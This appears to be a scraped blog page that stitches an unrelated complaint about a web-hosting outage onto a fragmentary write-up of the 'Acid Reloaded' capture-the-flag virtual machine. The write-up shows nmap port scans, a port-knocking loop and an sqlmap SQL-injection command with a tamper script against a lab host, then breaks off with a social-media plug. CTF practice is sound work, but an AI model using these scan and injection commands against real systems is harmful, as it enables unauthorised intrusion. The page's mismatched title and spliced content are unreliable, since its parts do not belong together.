Acid – Reloaded | Root privileged Escalation


chiaki , new york, NY – it is justNOThost – First, we found out our site is not up all of sudden. We don’t know how long but it stayed down for 3 days after we found out. They never let us know until we contacted them. When we contacted them they said they have a broken server and our data was on that one. Over 3 days they didn’t do anything like moving the data to the working server, they just left as it is for 3 days until the server were fixed. Web hosting company not hosting over 3 days? That is ridiculous, and what made it worse is that they never contacted to customers, no information on their website, their web site just keep saying that they are the most reliable service provider. After 3 days with our many contact to them, it was fixed finally. Right after that, we found out our emails on the domain is not working, and it is not resolved yet. We can’t receive emails at all at this point. Those sites we had problem is e-commerce site as well. They just don’t care at all. Also they screwed up our SSL before as well.


#acidreloaded #sqlmapadvanced #liveheader #livechallange #stenography #privilegedescalation
ACID RELOADED SOLUTIONS
nmap -sT -p- -Pn IP -oN nmap_scan.txt

For open filtered port I’ve run this command

for x in 3 2 1; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 192.168.56.103; done

Or I’ll post bash script later very soon

P.S. If you’re using Virtualbox, please be sure that you’re using just Host-only Adapter, otherwise the knock will fail. Don’t know why, but as soon as I’ve changed it the port was open.

After knocking I’ve run nmap again to check what was changed, and this is what I’ve found:

nmap -sS -p- -Pn IP -oN nmap_scan_stealth_2.txt

So, Dirbuster has always been my friend.
sqlmap -u “http://192.168.56.103:33447/bin/l33t_haxor.php?id=1” –dbs –dbms=MySQL -p “id” –tamper=space2comment

For more contact me
https://instagram.com/realvilu

viluhacker

4 Comments